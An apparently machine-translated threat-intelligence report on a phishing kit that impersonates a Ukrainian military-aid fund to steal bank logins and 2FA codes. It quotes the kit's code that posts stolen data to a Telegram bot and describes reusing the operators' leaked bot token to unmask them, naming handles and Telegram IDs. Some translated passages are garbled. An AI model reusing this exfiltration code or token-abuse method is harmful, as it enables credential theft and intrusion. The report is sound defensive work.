スポンサーに関する開示( クリックして展開 )
本調査の公式スポンサーをご紹介します
🏆 NiceNIC International Group Co., Limited 🏆
最も 権威ある その登録機関が Netcraftと提携している (そのシステムを欺くことで) · の公式ドメインプロバイダー 「Kraken」の薬物取引市場 ・まとめ買い割引サービス・の熱心なファン 「典型的な詐欺師」 VKコミュニティ — だが、いまだに匿名化講座を購入していない
- 「中国人」(香港)と自称しているものの、この作品の作者は ゴルロフカ、ドネツク人民共和国。中国のブランドロゴは、利用規約と同様に、あくまで装飾的なものに過ぎない。
- 維持する ロシア語のサポート VKontakteやTelegramを通じて、販売している
.ru reg.ruが請求する場合、200ドル 120₽ (~$1.30) - Trustpilotのネガティブなレビューで言及されている 薬物取引サイトのドメイン 謎めいた形で姿を消した。偶然か? とんでもない。
- の熱心な購読者 「典型的な詐欺師」 (典型的な詐欺師)VKコミュニティ――登録業者が詐欺グループをフォローしているのを見れば、そのターゲット層がわかる
- 協力先 ネットクラフト 上場廃止を免れるのに必要な最低限の措置にとどめつつ、フィッシング、ギャンブル、麻薬関連のドメインのためのインフラを維持している
スポンサーへの約束: 「Типичный Мошенник」によるこの投稿が現実のものとなったとき――現時点でわかっている情報に基づけば、それは時間の問題だ。 いつ、ではなく もし — チーム全員でVKontakteに登録し、このコミュニティをフォローします。これが私たちからのスタンディングオベーションだとお考えください。👏
* これは風刺です。NiceNICはこの調査を後援したわけではありません。しかし、同社が当社の不正利用報告に対して5日以上も対応を拒否したため、この調査が必要となったのです。上記の内容はすべて、公開されている情報および当社の運用経験に基づいています。 NiceNICに関する詳細な特集記事を読む →
PhishDestroyが発見したこと
2026年3月20日、PhishDestroyの自動脅威検知Pipelineが警告を発した dopomogvoina[.]sbs — 登録されたばかりのドメインで、某サイトを装ったフィッシングサイトがホストされており、 「守護者の盾」 (「Shield of the Defender」):ウクライナへの軍事支援を装った偽の財団。このサイトは、ウクライナの退役軍人、戦傷者、戦没兵士の遺族を標的とし、政府からの経済支援を約束する一方で、ウクライナの大手銀行5行の銀行認証情報を盗み出している。
以下に、当社の自動分析によって明らかになったすべての情報を詳細に解説します。具体的には、ソーシャルエンジニアリング、技術的インフラ、リアルタイムのオペレーター制御システム、そしてこれを運営している人物の身元などです。
影響評価
このサイトは、特に最も脆弱な立場にある人々、すなわちPTSDを抱える戦闘経験のある退役軍人、政府の支援を求める戦死兵士の遺族、そして複雑な行政手続きに翻弄されている負傷軍人を対象としています。認証情報が1つ盗まれるだけで、数分以内にアカウントが完全に乗っ取られる恐れがあります。
第1節:おとり――偽の軍事援助財団
ドメイン dopomogvoina[.]sbs 2026年3月20日に、以下の手続きを通じて登録されました。 NiceNICインターナショナル・グループ株式会社、虐待への対応が遅い、あるいは全く行われていないという実績が広く知られている登録機関である。その .sbs TLD(Side-By-Side)は、使い捨てのフィッシングインフラとして頻繁に悪用される、低コストのgTLDです。
このサイトは、政府と密接な関係にある専門的な支援ポータルサイトとして自らを位置づけている。ヘッダーにはウクライナの国旗が大きく掲げられ、軍事的なイメージが信頼性を醸し出しており、ページの内容はウクライナ語で丁寧に書かれており、その官僚的な表現は、正規の政府プログラムを彷彿とさせるものである。

スクリーンショット 5 — 「Щит Захисника」(Shield of the Defender)を装ったフィッシングサイトのランディングページ。
信頼性を高めるため、運営側はランディングページに目立つように表示された統計カウンターを偽造した:
- 2,847件の申請 — つまり、すでに数千人が支援を受けていることを示唆している
- 4,720万ペソが分配された — UAHにおける、大柄だが現実味のある人物
- 19のプログラム — 包括的で、複数のプログラムにわたる取り組みを示唆している
これらの数値は完全に捏造されたものであり、バックエンドとの接続なしにページのソースコードにハードコーディングされています。これらが果たす役割はただ一つ、被害者の躊躇を打ち消すための「社会的証明」として機能することです。
第2章:罠 ― 5つの銀行、ひとつの目標
「Подати заявку」(申請を送信)をクリックすると、被害者には銀行選択画面が表示されます。ウクライナの大手リテール銀行5行が選択肢として表示され、それぞれが公式のブランド名とロゴを掲げています。ここで、ソーシャルエンジニアリングの手口は、感情的な操作から技術的な窃取へと移行します。

スクリーンショット 6 — 銀行選択画面。各オプションを選択すると、それぞれ独自の認証情報窃取の手順が実行される。
このサイトのJavaScriptバンドルを分析したところ、各銀行には 独自の多段階型認証情報収集手順、その銀行の実際の認証フローに合わせて調整されたもの:
PrivatBank
ログインパスワードPINSMS
どの銀行においても、攻撃の流れは同じパターンに従っています:
偽の支援ページ
銀行の選択
ログインの複製
2FAの傍受
アカウント乗っ取り

スクリーンショット 7 — 複製されたPrivatBankのログイン画面。

スクリーンショット 9 — 複製された PUMB ログイン画面。

スクリーンショット 10 — 攻撃の全流れ:偽の軍事支援ページから銀行の選択、認証情報の窃取、そしてアカウント乗っ取りに至るまで。
技術スタック: React SPA フロントエンドは以下を通じて提供されます Cloudflare CDN、そして Express.js バックエンドでは認証情報の流出を処理している。Reactのアーキテクチャにより、正規の銀行インターフェースと見分けがつかないような、シームレスな多段階フォームを実現している。
第3節:オペレータによるリアルタイム制御
これは、静的なデータベースを持つ単なる認証情報収集ツールではありません。このフィッシングキットには、 ライブWebSocketコントロールパネル これにより、人間のオペレーターが各被害者のセッションをリアルタイムで操作できるようになる。
WebSocketエンドポイントは wss://dopomogvoina[.]sbs/ws 以下のメッセージタイプに対応しています:
register — New victim session created
update_user_data — Stolen credentials transmitted to operator
next_step — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question — Operator sends custom prompt to victim
このリアルタイム制御により、オペレーターは以下のことが可能になります:
- 待機状態を強制する — 被害者の実際の銀行口座にログインしている間、「申請を処理中です…」と表示する
- 特定のステップにリダイレクトする — 最初のSMSコードの有効期限が切れた場合は、再度コードをリクエストする
- 偽のエラーメッセージを表示する — 「コードが無効です。再入力してください」というメッセージを利用して、複数の2FAトークンを収集する
- カスタム質問をする — セッションの途中で、生年月日、カード番号、またはその他の追加情報を要求する
なぜこれが危険なのか
オペレーターによるリアルタイムの操作により、時間ベースの2段階認証(2FA)の保護策は無力化されます。オペレーターはSMSの認証コードを傍受し、その有効期間(通常30~120秒)内にコードを使用する一方、被害者は偽の「処理中」アニメーションをただ見つめ続けることになります。

スクリーンショット 8 — 認証情報の盗用を仕掛けるために使用された電話番号入力フォーム。

スクリーンショット 11 — 被害者のセッションを制御するための、オペレーター用のリアルタイムボットパネル。
1回のセッションごとに盗まれたデータの全範囲: phone, password, PIN, SMS code, card number, date of birth、および email.
第4章:Cloudflareの舞台裏 ― 2つのプロジェクト、1台のサーバー
Cloudflareのプロキシ機能によりオリジンサーバーは隠されていますが、PhishDestroyのインフラ分析Pipelineによって、真のオリジンIPが特定されました: 45.131.214[.]148、ホスト先: RapidSeedbox / LeaseWeb オランダで。
重要な点: dopomogvoina[.]sbs は、以下を介してプロキシ処理されます Cloudflare、その発信元IPを隠蔽しています。しかし、当社のシステムでは、 hlpforvpeople[.]sbs — 同じNiceNICレジストラを通じて登録され、パターンが一致する関連ドメイン。そのドメインは Cloudflareの「背後」ではない, その発信元IPアドレスを直接公開して: 45.131.214[.]148.
このIPアドレスに直接接続する — 経由せずに Host ヘッダー — 予想外のことを明らかにした:ある まったく別のフィッシングサイト. ウクライナへの軍事支援の代わりに、デフォルトのvhostが提供された 「ヘルスケアID」、インドネシアの健康保険を装ったフィッシング詐欺。サーバーは同じだが、被害者は全く異なり、国も全く異なる。
同じサーバー、同じ運営者、異なる被害者
- プロジェクト1: ウクライナへの軍事支援 → 退役軍人から銀行の認証情報を盗む
- プロジェクト2: インドネシアの健康保険 → 市民の医療情報を盗む
- 同じ Express.js スタック、同じ WebSocket リアルタイムコントロールパネル
- 同じBT-Panel(宝塔)サーバー管理インターフェース
- 2番目のプロジェクトのC2ドメイン:
rezervtemka[.]cc — PhishDestroyの脅威データベースで特定された、既知のフィッシングパネル - ロシア語のコメント インドネシア語プロジェクトのソースコードには、同じCIS系開発者たちによる記述が確認できる

スクリーンショット 12 — 同じオリジンサーバーを共有する 2 つの並行したフィッシング攻撃:ウクライナの軍事支援(dopomogvoina)とインドネシアの健康保険(HealthCare ID)。
インドネシアのフィッシングテンプレートは、 PhishDestroyの脅威インテリジェンスデータベースに登録されている既知のキット. 東南アジア全域で、このテンプレートのバリエーションが、インドネシア、タイ、ベトナムの金融機関を標的として展開されているのを確認しています。攻撃者は、同じバックエンドインフラを再利用しつつ、国ごとにテンプレートを差し替えるだけなのです。
無差別な犯罪者たち
これが、現代のフィッシング攻撃の実態です:
業者たちは、誰から盗もうと気にしない. 軍事支援を求めるウクライナの退役軍人、健康保険に加入するインドネシア人労働者――ターゲットは、どのテンプレートが最も収益を生むかによって変わる。同じロシア語を話すオペレーターたちが、同じサーバーから両方のキャンペーンを同時に運営し、まるでテレビのチャンネルを変えるかのように、さまざまな国の被害者を次々と切り替えている。今日はウクライナの銀行だ。 明日はイスラエルの銀行になるかもしれない――ボニャは2026年3月にすでにその件について尋ねていた。
第5章:すべてを露呈させてしまった config.json
たった1つの設定ミスが、どのようにして業務全体を混乱に陥れたのか――その経緯を段階を追って解説します。
オリジンサーバーの2つ目のプロジェクトを特定した後、PhishDestroyの JSアナライザー — 当社の自動化されたJavaScript分析ツール — は、インドネシアのフィッシングサイトのバンドルを https://45.131.214[.]148/assets/index-ZMQxHb_h.js。このアナライザーは、335KBのJavaScriptファイルから、すべてのAPIエンドポイント、外部URL、および設定パスを抽出しました。その結果、以下の点が判明しました:
- にある5つのAPIエンドポイント
rezervtemka[.]cc — 資格情報の検証用 C2 パネル - へのWebSocket接続
wss://rezervtemka[.]cc - 被害者の追跡のためのFacebookピクセルの導入
- ~への言及
/config.json — Telegramボットの設定用に実行時に読み込まれる
この手がかりをたどって、私たちは /config.json 送信元IPから。このファイルは認証なしでアクセス可能でした。ウェブルートに置かれており、誰でも読み取ることができました:
async function loadConfig() {
const response = await fetch('/config.json');
// ...
}
async function sendNotification() {
const cfg = await loadConfig();
await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
method: 'POST',
body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
});
}
その /config.json そのファイルは、元のIPアドレスから直接アクセス可能だった — 認証もアクセス制御もなく、単にWebルートに置かれたプレーンなJSONファイルがあるだけ:
{
"bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"chat_id": "-100XXXXXXXXXX"
}
Telegramのボットトークンは、ユーザー名とパスワードの両方の役割を果たします。このトークンを所持している者は誰でも、そのボットとしてAPI呼び出しを行うことができます。運営者は、自分たちのトークンを誰でもアクセスできるファイルに保存したままにしていました。 6回のAPI呼び出しを経て、必要な情報はすべて揃いました:
getMe — ボットのID:「MonettiCRM」(@MonettiCRM_bot)
getChat(chat_id) — グループ名:「Idr card」、招待リンクが有効な状態
getChatAdministrators — グループ作成者を含む3人の管理者
getChat(creator_id) — 作成者: @monettiescobar, Telegram Premium、ビジネスプロフィール、タイムゾーン UTC+3
getChat(admin2_id) — 2人目の管理者:プロフィールが空白、サブアカウントの疑いあり
getChatMemberCount — オペレーターグループのメンバーは計5名

スクリーンショット 13 — OSINTの完全なプロセス:公開されたconfig.jsonから、わずか6回のAPI呼び出しでオペレーターの身元を特定するまで。
設定ミスのあったたった1つのファイルから、わずか6回のHTTPリクエストで運営者の身元を完全に特定できた。エクスプロイトも不正アクセスも一切なく、運営者自身が公開していたトークンを使用した、標準的なTelegram Bot APIの呼び出しだけで実現した。
第6節:オペレーター
犯罪における創造性に関する一考察
以下は、最悪のエイリアス選びの典型例です。具体的には、 モネッティ・エスコバル — だって、歴史上最も有名な麻薬王にちなんで名乗るほど「目立たない」ものはないからね。それから、 ボニャ、別名 パパ・ザコン・ヴォル (文字通り「法によるパパ泥棒」――ロシアの犯罪組織のヒエラルキーを模した表現)、 ボア、および bubullikk。そして最後に デヴォイズ、そのハンドルネームは @devosus 「dev ops us」と書かれているように見えますが、これはユーザー名に自分の役職名を入れた開発者のようです。こうした人たちは、自動化された脅威インテリジェンスを出し抜けると思っていたのです。ネタバレ:結局、それは叶いませんでした。

スクリーンショット 14 — リークされたボットトークンを通じて明らかになった、Telegramのオペレーターグループ「Idr card」。

オーナー/クリエイター
モネッティ・エスコバル
@monettiescobar
Telegram ID:8135223234
Telegram Premium、ビジネスプロフィール
タイムゾーン:UTC+3(CIS地域)
公開メッセージ10件 — 厳格なOPSEC
TraFFeeQ チャットメデューサ Google Adsディープフェイクチャンネル
Telegram ID:6242202706
別名:PapaZakonVor、Boa、bubullikk
12のグループにまたがる261件のメッセージ
DC2 — アムステルダム(オランダ)
CryptoGrabSTYXマーケットレイヴンCCEMPIRE CHATフェニックス・ソリューション
Telegram ID:8213612730
フィッシングキットの開発者 — 運営者たちは彼を「コーダー」と呼んでいる
侵害が発見された際、「防御策について考える」よう求められた
設計上、公共空間への影響を最小限に抑える
ハンドル @devosus ≈ 「dev ops us」 — ユーザー名として役職名を使用
キット開発者インフラセキュリティ
モネッティ・エスコバル — ザ・ボス
MONETTIは厳格な業務上のセキュリティを維持しており、唯一 公開メッセージ 10件 2つのグループにまたがって。しかし、そのグループがすべてを物語っている: TraFFeeQ チャット (詐欺を目的としたトラフィック・アービトラージ)、 メデューサ Google Ads (ブラックハットなGoogle Ads)、および ディープフェイクチャンネル. 彼のTelegramのビジネスプロフィールには「Есть предложение」(「提案がある」) — サービスを公然と宣伝している。UTC+3のタイムゾーン(モスクワ/ミンスク/キエフと同じ)と24時間365日の営業時間は、CISを拠点とし、24時間体制で運営されていることを裏付けている。
ボニャ — うっかり者
MONETTIの慎重なOPSECとは異なり、ボニャ(旧別名: パパ・ザコン・ヴォル — ざっくり言えば「DaddyThiefByLaw」 — は、膨大なデジタル上の痕跡を残した — 12の地下グループにまたがる261件のメッセージ。彼のチャット履歴は、まるで犯罪者の経歴書のように読める:
ボニャ自身の言葉(ロシア語からの翻訳)
- 「2.0アンペア対応のヒューズ」 → 「単なる『[銀行のセキュリティ] 2.0』を装ったフィッシングに過ぎない」 — フィッシングキットの、最新の銀行セキュリティシステムとの互換性について議論する
- 「良いドロップはなかなか見つからない」 → 「頼りになるマネーミュールを見つけるのは難しい」 — 資金引き出しの共犯者を探す
- 「私のところの文化センターで働かない?」 → 「私のコールセンターで働きませんか」 — オペレーターの募集
- 「ここで、イスラエルの銀行と取引したことがある人はいますか?」 → 「ここにいる方で、イスラエルの銀行と取引したことがある人はいますか?」 — 新たなターゲットへの拡大(2026年3月)
- 「フィンカのロゴは、特に見当たらないな」 → 「財務ログはあまり見かけない」 — 盗まれた認証情報の品質について議論する
- 「プロキシ1台につき、1~2バンクの電流」 → 「1~2行のみを対象とする1つのプロキシ」 — 銀行詐欺に関する運用上のセキュリティについて議論する
- 「彼女のカードがATMに飲み込まれてしまった」 → 「彼女のカードがATMに飲み込まれてしまった」 — マネーミュールが、「ATMがカードを飲み込んだ」と偽って、彼らから60,000ペソを盗んだ。犯罪者でさえ、共犯者に騙されることがあるのだ。
彼が所属しているグループを見れば、その全貌が明らかになる: CryptoGrab (暗号資産ウォレットの資金を吸い取る者たち)、 STYXマーケット (盗まれたデータを扱う闇市場)、 Raven CC チェッカー (クレジットカードの有効性確認ツール)、 EMPIRE CHAT そして フェニックス・ソリューション (詐欺の共謀)。これは単発の犯行ではなく、サイバー犯罪のエコシステムに深く関与している人物である。
Devoys — 開発者
作戦の技術的な中核を担う存在。設計上、外部への露出を最小限に抑えていた――グループが突破された際、ボニャは彼に明確に呼びかけた: 「@devosus、俺たちがボコボコにされる前に、防御策を考えておけ」 — 「@devosus、やられる前に防御のことを考えようよ。」 この違反に対する彼の皮肉な反応―― 「インターポールに加入したとき」 (「いつ補間を行うか」) — これによると、彼らにとってこれが初めての危機一髪だったわけではないようだ。
行動分析:261件のメッセージを解読
PhishDestroyのOSINTPipelineによって収集・翻訳された 公開メッセージ全261件 Bonyaから、12の地下Telegramグループにまたがるメッセージ(2024年6月~2026年3月)。DeepL APIによる機械翻訳を行い、文脈に応じて手動で修正を加えた。これらのメッセージからは、犯罪活動の種類ごとに以下に分類された、完全な活動実態が明らかになっている。
メッセージの配信状況:12のグループに計261件のメッセージ
- 💬ONE|チャット — 91件のメッセージ(詐欺対策の連携)
- 最新情報/認証 — 37 件のメッセージ(認証詐欺)
- ロレックス | 総合チャット — 28 件のメッセージ(カードング)
- EMPIRE CHAT — 24 件のメッセージ(闇市場)
- Фбстор — 23 件のメッセージ(トラフィック・アービトラージ)
- FB-DOC — 22 件のメッセージ(広告詐欺)
- フェニックス・ソリューション — 17 件のメッセージ(銀行詐欺)
- CryptoGrab — 11 件のメッセージ(暗号資産の流出)
- STYXマーケット — 2件のメッセージ(闇市場)
- Raven CC チェッカー — 2 件のメッセージ(カード確認)
銀行詐欺とフィッシング
💬ONE|チャット2025年3月
「ここには2.0フィッシュしかいない」
そして、こちらは2.0アンペア対応のフィッシュです
新しい銀行のセキュリティプロトコルとのフィッシングキットの互換性について議論する
💬ONE|チャット2025年3月
「おい、ここじゃフィッシュで何も売ってないよ。フィッシュは支払いの手段なんだ」
ブラタン、ここではフィッシュで何も売ってないよ。支払いにフィッシュを使うんだ。
「販売目的のフィッシング」と「直接窃取目的のフィッシング」の区別
フェニックス・ソリューション2026年3月
「ここにいる方で、イスラエルの銀行と仕事をしたことがある方はいらっしゃいますか?」
ところで、ここにイスラエルの銀行と取引したことがある人はいますか?
イスラエルの銀行業界への事業拡大 — 当社の調査の5日前
ロレックス | 総合チャット2024年9月
「代理人が1人の場合は、銀行は1~2行のみ」
1つのプロキシにつき1~2つのバンクの場合、電流は
複数銀行を標的とした不正行為における運用上のセキュリティ:検知を回避するため、1~2行につき1つのプロキシを使用する
ロレックス | 総合チャット2024年9月
「財務ログについてはあまり見当たらない」
フィンケのロゴは、正直あまり見当たらないな
闇市場で取引される盗まれた銀行認証情報の品質に対する不満
マネーミュールとキャッシュアウト
💬ONE|チャット2025年3月
「良いドロップはなかなか手に入らない」
良いドロップを見つけるのは難しい
「ドロップス」=盗まれた資金を現金化するマネーミュール。勧誘の難しさについて不満を漏らしている。
💬ONE|チャット2025年3月
「私のコールセンターで働きませんか」
私のところの文化センターで働くために来た
詐欺コールセンターの運営に携わる人材を積極的に募集しています
最新情報2024年6月
「6万が盗まれた」
うちから60kが盗まれた
マネーミュールが、詐欺師たち自身から60,000ペソを盗んだ。皮肉な正義だ。
最新情報2024年6月
「ATMがカードを飲み込むなんて、一体どういうことなんだ?」
一体どうやってATMがカードを飲み込んだんだ?
その仲介業者は、ATMが盗んだ資金を横取りするためにカードを「飲み込んだ」と主張した。詐欺師が詐欺師を騙すという構図だ。
最新情報2024年6月
「彼女が私たちに振り込んでくれたんだけど、その後、そのお金を移動させるための主な受け取り先がなかったんだ」
彼女はそれを私たちに転嫁してきたが、その時点で私たちには送金するための主な送金手段がなかった
資金流出の経路の説明:被害者 → 中間口座 → 主要なマネーミュール
トラフィック不正および広告の悪用
EMPIRE CHAT2026年3月
「Googleは使わないよ、Facebookだけ」
まあ、僕はGoogleは使わず、Facebookだけを使ってるんだ
Facebook広告の不正行為を専門としており、フィッシングページへのトラフィックを誘導している
FB-DOC2026年2月
「保証人がいない限り、広告費の%を支払うつもりはない」
私も、保証がない限り、支出の何パーセントかという割合で資金を投入することはしないだろう
不正なFacebook広告キャンペーンの実施に関する支払い条件の交渉
CryptoGrab2025年1月
「FacebookでアメリカをターゲットにAMLを試してみたんだけど、ネット上にはまともな設定例が見つからなかった」
FacebookでAMLについて調べてみたけど、ネット上にはアメリカに関するまともな情報、古い情報さえも見つからなかった。
Facebook広告を利用して、米国の被害者を標的としたマネーロンダリング防止を装った詐欺を仕掛けようとした
心理プロファイル:ボニャ
261件のメッセージからなるコーパスからは、 中堅クラスのサイバー犯罪者 多岐にわたる手口:銀行フィッシング、マネーミュールネットワーク、Facebook広告詐欺、仮想通貨の不正流出、クレジットカード情報の不正利用。主な特徴:
- 業務上の不注意 — 1つのアカウントで公開グループに計261件のメッセージを投稿。複数の別名(PapaZakonVor → Boa → Bonya)の使用は、OPSECの重要性を認識していたものの、それを実践できていなかったことを示唆している
- 採用における考え方 — 積極的に「私のコールセンターで働いてください」と呼びかけ、業務ノウハウを現金と引き換えに販売している
- 被害者への無関心 — ウクライナ、ヨーロッパ、イスラエル、そしてアメリカの標的について、等しく客観的な視点で論じている。地理的な要素は、この詐欺の方程式における単なる変数に過ぎない
- 信頼の問題 — 6万ペソのために、自身の資金運び屋に裏切られた。皮肉なことに、これは彼が被害者に抱かせる不信感を如実に反映している
- 拡大主導型 — つい2026年3月にも、新たな銀行市場(イスラエル)を積極的に開拓しており、ウクライナでのフィッシング攻撃は、同時進行中の数多くの作戦のうちの1つに過ぎないことを示唆している
Bonya:メッセージログ全件(12のグループにまたがる253件のメッセージ)
-- Phoenix Solution (16件のメッセージ) --
B
ボニャ2026-03-17 14:22
ここには、イスラエルの銀行と仕事をしたことがある方はいらっしゃいますか?ところで、ここにイスラエルの銀行と取引したことがある人はいますか?
B
ボニャ2026-03-17 14:22
静かに仕事をしている。私たちもひっそりと仕事をしている
B
ボニャ2026-03-17 14:17
調子はどう?調子はどう?
B
ボニャ2026-03-17 14:17
みなさん、こんにちはみなさん、こんにちは
B
ボニャ2026-03-15 19:02
まあ、もうほぼ全部直ったよ。まあ、全体的にはもうすべてうまくいっているよ
B
ボニャ2026-03-15 19:02
まあ、ちょっと面倒ですねまあ、ちょっと面倒なことになっちゃったね
B
ボニャ2026-03-15 19:01
ああ、僕もこっそりいろいろやってたよ、めちゃくちゃだった。ああ、確かに、こっそりやる仕事ももううんざりだ
B
ボニャ2026-03-15 19:00
休日はどうでしたか?週末はどうだった?
B
ボニャ2026-03-15 19:00
皆さん。皆に共通する
B
ボニャ2026-03-14 14:29
マリクだと誰もが知っている今、彼はもはやそれほど無名ではない。もうそんなに匿名ってわけじゃないよ、だってみんなマリクが何者か知ってるんだから
B
ボニャ2026-03-14 14:24
リボーン生まれ変わった
B
ボニャ2026-03-14 14:24
あはははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははははアハハハハハハハハハ
B
ボニャ2026-03-14 14:23
チャットルームがなくなっているのを見て、がっかりしました。チャットが消えてしまったのを見て、すごくがっかりしたよ
B
ボニャ2026-03-14 14:22
もう君には会えないかと思っていたよ。もう、あなたたちに会えないかと思っていました
B
ボニャ2026-03-14 14:22
くそっエバ
-- 👨⚕️ FB-DOC — トラフィック仲裁に関するチャット (21件のメッセージ) --
B
ボニャ2026-03-15 07:23
@fbdoc21@fbdoc21
B
ボニャ2026-03-15 07:20
自分のチンポで自分の額を殴ってみろ。自分のペニスで自分の額にスパムを書きなぐる
B
ボニャ2026-03-06 15:18
2.5😂の画面に5つくらい。スクショの5と同じく2.5😂
B
ボニャ2026-02-19 17:05
皆さんへ。皆さん、こんにちは
B
ボニャ2026-02-19 17:04
もし取引を始めたら、笑っちゃうよ。もし取引を始めたら、俺は笑っちゃうよ
B
ボニャ2026-02-19 17:04
コンチネンタル?コンチネンタル?
B
ボニャ2026-02-19 17:04
ほら、あそこにいるよ。ほら、彼女は同意したよ
B
ボニャ2026-02-19 17:01
ですから、保証人について尋ねる際は、必ず身元確認を行ってください。保証について質問する際は、必ずスクリーンショットを撮っておいてください
B
ボニャ2026-02-19 17:00
彼は保証人のことを尋ねると、すぐに姿を消してしまった。保証人についてちょっと尋ねただけで、すぐに姿を消してしまった
B
ボニャ2026-02-19 17:00
ay carinaカリーナ
B
ボニャ2026-02-19 16:59
じゃあ、保証人を立てるつもりなんだね?じゃあ、保証人になるの?
B
ボニャ2026-02-19 16:57
私も、保証人がいない限り、売上高の何パーセントという条件での出資はしないだろう。私も、保証がない限り、支出の何パーセントかという割合で資金を投入することはしないだろう
B
ボニャ2026-02-19 16:57
まあ、彼女はスクリーンショットを投げつけてきたのに、あなたは私に何もくれなかったわ。まあ、彼女はスクリーンショットをアップしたのに、君は何も出さなかったね
B
ボニャ2026-02-19 16:56
彼女が投稿したスクリーンショットを見てみて彼女が送ってきたスクリーンショットを見てみて
B
ボニャ2026-02-19 16:55
彼は保証人について書いていなかったの?彼は保証人について書いていなかったのか?
B
ボニャ2026-02-19 16:54
あんた、変人だね😂お前、変態かよ😂
B
ボニャ2026-02-19 16:53
あなたは保証人を求めた。あなたは保証人に頼んだの?
B
ボニャ2026-02-19 16:52
ここでどの場所か
B
ボニャ2026-02-17 14:37
誰か、お店にいい車を仕入れてくれる人はいないかな。ショップを立ち上げてくれる人、いい車を持っている人
B
ボニャ2026-02-17 12:10
どこでも、あなたが望む場所ならどこでも、彼らがやってくれます😂どこに行っても、気分次第でやってくれるよ😂
-- EMPIRE CHAT (24件のメッセージ) --
B
ボニャ2026-03-14 13:17
やり方はもう分かったんだけど、説明するのが面倒くさいんだ。やり方はもう分かったけど、説明するのが面倒なんだ
B
ボニャ2026-03-14 13:17
あいつは、何があってもお前をぶっ潰すつもりだ。どんな状況でも、あいつは君を裏切るだろう
B
ボニャ2026-03-12 17:16
さまざまな方法で。それぞれ違う
B
ボニャ2026-03-12 17:08
+ それに、今は嵐が次々と発生しています。+ 今、激しい嵐が吹き荒れている
B
ボニャ2026-03-12 17:07
黒なら、きっと……もし黒だったら、賭けてみただろうに
B
ボニャ2026-03-12 17:07
オファーの内容にもよりますが、もしそれが「ホワイト」なら、はい。オファーの内容によるけど、白ならOK
B
ボニャ2026-03-12 17:06
まるで別世界だ「二つの異なる世界」とは
B
ボニャ2026-03-12 17:06
他にない他に全くない
B
ボニャ2026-03-12 17:06
「PCのみ」となるように設定できますそこで、PCのみに限定するように設定できます
B
ボニャ2026-03-12 17:05
Googleは、私が思っているほど効果的ではない。Googleは、私としてはそれほど効果的ではないと思う
B
ボニャ2026-03-12 17:05
まあ、僕はグーグルは使わないよ。フェイスブックだけさ。まあ、僕はGoogleは使わず、Facebookだけを使ってるんだ
B
ボニャ2026-03-12 17:05
その過程で、どこかでリガチャーを見つけなければならない限りは。ただし、これらすべてのバカどもをまとめて一か所に集める必要があるという条件付きで
B
ボニャ2026-03-12 17:04
リジェクトやアキーが、まるで嵐のように飛び交う。などなど。リジェクト、アカウントが嵐のように次々と消えていく。などなど
B
ボニャ2026-03-12 17:04
人生って、いつもバラ色ってわけじゃないんだぜ、兄弟。いや、それだけじゃないぜ、相棒。まだ続きがあるんだ。
B
ボニャ2026-03-12 17:03
信頼性の高いすべての航空会社の定期便すべて、信頼性が最も高い通常のバッテリーです
B
ボニャ2026-03-12 17:03
今の市場には、良い代理店は一つもありません。今の市場には良いエージェントがいない
B
ボニャ2026-03-12 17:02
怖いというより、むしろ気が気じゃない怖いというよりは、むしろ緊張する感じかな
B
ボニャ2026-03-12 17:02
仮想通貨、ギャンブルへの情熱、そして黒人としてのアイデンティティ――これらすべてが溢れ出ている仮想通貨、ギャンブル、ダークウェブ、全部流れてる
B
ボニャ2026-03-12 17:01
市が最後に行ったのは、2dへの不正アクセスだった。最近、2Dでプレイしていたゲームがすごく良かった
B
ボニャ2026-03-12 17:01
登攀について言えば、私自身の状況や予算の観点から考えてみると、2Dの登攀に必要なものは、テストに1~2k zelesを費やすことですが、それは長くは続かないでしょう。探せば見つかるけど、自分の資金か予算から出すとしても、2Dで動くものを見つけるにはテストに1~2千ゼラを費やす必要があり、それでも長くは持たないだろう
B
ボニャ2026-03-12 17:00
今、注いでいます私は注ぐ
B
ボニャ2026-03-12 16:59
(白人によるオファーにはそのような要件がないため)なぜなら、ホワイトオファーにはそのような要件がないからです)
B
ボニャ2026-02-14 14:33
AMLテストでドレイナーを持っているのは誰ですか?保証人に「dep」または「ready」と記載されている場合のみです。AMLテスト用のドレイナーをお持ちの方はいらっしゃいますか? デポ付きのもの、または保証付きで即納可能なものに限ります。
B
ボニャ2026-01-11 03:14
FBビートに誰かがいて、仲間もいます。FBの補充が必要です。価格は応相談です。Facebookで投稿した人もいれば、悪口を書いた人もいる。Facebookのアカウントにチャージが必要だ。料金は相談の上で決めよう。
-- SТYХ СНAT [ STYXMARKET.ST ] (投稿数 2件) --
B
ボニャ2025-12-05 12:04
請求書、Payzaty、Cashfree、Eportal 3dsが必要請求書、Payzaty、Cashfree、Eportal 3dsが必要
B
ボニャ2025-11-22 11:14
チャットの保証人ってあるの?ここにチャットのモデレーターはいますか?
-- トラフィック仲裁チャット (2件のメッセージ) --
B
ボニャ2025-11-24 14:50
100%100%
B
ボニャ2025-11-24 14:49
Tgチャンネルが乗っ取られることになるそのチャンネルが乗っ取られる
-- Raven CC チェッカー (2 件のメッセージ) --
B
ボニャ2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
ボニャ2025-11-21 21:18
/check/check
-- Vision Browser チャット (2件) --
B
ボニャ2025-11-14 16:47
ありがとうございます。ありがとう
B
ボニャ2025-11-14 16:47
vicen werk in ru?ヴィジェン・ワークはロシア語ですか?
-- 💬ONE|チャット (86件のメッセージ) --
B
ボニャ2025-03-05 17:06
みんな、パッドが買えるお店を教えてよ。みんな、プレイグラウンドがある場所を教えてよ
B
ボニャ2025-03-05 16:22
もう、マニックなんて出せないよただ、マニキュアすら施せないんだ
B
ボニャ2025-03-05 16:22
同様に同様に
B
ボニャ2025-03-05 16:21
メンターが生徒たちとチャットルームを持っているかどうか、早く答えろよ。くそっ、誰か教えてくれよ。メンターは生徒たちとチャットしてるのか、してないのか
B
ボニャ2025-03-05 16:10
で、tsって誰?ところで、TSって誰?
B
ボニャ2025-03-05 15:44
難しいことではありませんが、ここには完全なマニュアルはなく、チュートリアルしかありません。そこ自体は難しくないけど、完全なマニュアルはここにはなくて、指導者たちから教わるだけなんだ
B
ボニャ2025-03-05 15:42
基本的には、そうですね。やり方さえ分かっていれば。まあ、できるならそうだな
B
ボニャ2025-03-05 15:42
